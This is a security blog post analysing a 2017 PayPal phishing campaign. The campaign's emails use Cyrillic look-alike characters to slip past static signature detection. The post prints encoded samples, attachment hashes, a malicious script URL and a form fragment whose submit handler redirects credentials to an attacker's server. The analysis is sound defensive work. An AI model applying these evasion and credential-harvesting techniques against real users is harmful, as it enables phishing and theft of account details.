Sunday, 1 October 2017

PayPal Phishing - Homographic Email Body

There's an ongoing PayPal Phishing Campaign in the wild which sends HTML attachments that spoof PayPal Forms and request users for sensitive information. This campaign was particularly interesting because the email body was encoded with Unicode characters which look similar to corresponding ASCII Characters.

Homographic attacks are usually performed to craft URLs which look like legitimate URLs by substituting some of the ASCII characters with their look alike Unicode characters.

However, in this particular campaign, the entire email body has been crafted using this technique.

Why apply Homographic Technique to Email Body?

Several Security Analysts as well as Security Vendors write static signatures which are crafted to detect patterns in the email body. The Homographic technique allows these static signatures to be easily bypassed because the attackers can mix ASCII as well Unicode characters to generate different patterns.

As an example, in the email shown in Figure 1 we can see that the email body looks like it's written in English Language. But if you pay close attention, you will observe that some of the English letters have been substituted with look like Cyrillic characters.


Figure 1
To get a better understanding of this, let's look at the email body with Unicode characters displayed with their equivalent encoding as shown in Figure 2.



Figure 2

The actual Unicode Encoded text is:

%D0%85%D0%B5ptember 29th 2017

Hell%D0%BE!

It %D0%B0%D1%80pea%D0%B3%D1%95 t%D2%BBat some of y%D0%BEu%D0%B3 %D0%B3ec%D0%BE%D0%B3d%D1%95 %D2%BBav%D0%B5 g%D0%BEne miss%D1%96ng %D0%BEr be%D1%81%D0%B0me out%D4%81at%D0%B5d.

Now, if we look up the above unicode encodings, we can understand how the attacker has mixed ASCII with Unicode characters.

As an example, let's decode the string: "%D0%85%D0%B5ptember 29th 2017"

Unicode Characters are always encoded using 2 bytes.

%D0%85 - S - CYRILLIC CAPITAL LETTER DZE
%D0%B5 - e - CYRILLIC SMALL LETTER IE

You can look up the Unicode Values here: http://www.utf8-chartable.de/unicode-utf8-table.pl?start=1024

In this way, we can see how the attacker has encoded the string: "September" by using Unicode Characters.

HTML Attachment Analysis

MD5 hash: bfe06c7da972a82477016193e5b3c3ac

The HTML attachment contains obfuscated JavaScript as shown in Figure 3. It uses HTML DOM to dynamically construct the PayPal HTML Form.


Figure 3

This is done by creating an HTML script tag dynamically with the src attribute set to: http://www.solutionivy.com/e1e99eb37b7fcecc7a18df3db5e65aac.js (shown in Figure 4).

Figure 4

After deobfuscating the above JavaScript, we can see the PayPal HTML form.

Another interesting technique is the dynamic replacement of the Action field in HTML form on  Submission.

The HTML Form looks as shown below:

<form name="ytrKbjzK" onsubmit="https://www.paypal.com/">
 .....
<input type=button class=submitBtn onClick=uF8Nu() value="Submit Form">

So, when the Submit button is pressed, the function,  uF8Nu() is invoked.

This function will dynamically replace paypal.com from the HTML POST Action field with the URL: hxxp://www.solutionivy.com/e1e99eb3.php when the form is submitted as shown in Figure 5.


Figure 5

The actual HTML form looks like shown in Figure 6.


Figure6

Below are some more HTML files from the wild which were sent in the same campaign and the corresponding email bodies were encoded using the technique described above.

ab7d6d006297e60311ff078f068a641d
213763dd92271558b5a0bb890b9fe12e
cc00a53518fe4bfb1bb91a9666669a60
f55fb03d626bb894a03339610b6360b0
08420289382d024f619dd33362e7af88
1cebd3b0aed36d88cb0b91b3199e41f8
763bb271183ca4d42c94199f1b9c210a
a504b0e6f5ceb01b525bfd66f2b368fa
21acb6cbb25101ec9f0ecc39dddd130e
befea3711344e43fd5b416b208d56995
a556dc89f48cab14f4ec678975eff822
04596ccd039fe04bfdbe1907fa1bf470

No comments:

Post a Comment